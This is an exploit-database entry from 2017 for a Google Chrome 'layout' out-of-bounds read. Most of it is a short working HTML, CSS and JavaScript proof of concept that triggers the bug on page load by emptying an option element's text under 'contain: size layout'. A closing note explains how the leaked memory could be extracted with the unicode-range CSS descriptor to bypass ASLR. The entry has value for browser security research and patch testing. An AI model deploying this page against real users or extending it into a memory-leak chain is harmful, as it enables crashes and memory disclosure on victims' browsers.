Google Chrome - 'layout' Out-of-Bounds Read

Author: st3n
Date: 22.02.2017
Verified
Category: Denial of Service (Exploits)
Platform: Multiple

Exploit Code


Chrome bug:


<style>
content { contain: size layout; }
</style>
<script>
function leak() {
  opt.text = "";
}
</script>
<body onload=leak()>
<option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>

Since this is a layout bug, AFAIK the leaked data can't be obtained via DOM calls; however, it's possible to obtain it using tricks like the unicode-range CSS descriptor (credit to Jann Horn for coming up with that approach), which is likely sufficient to turn this into an ASLR bypass.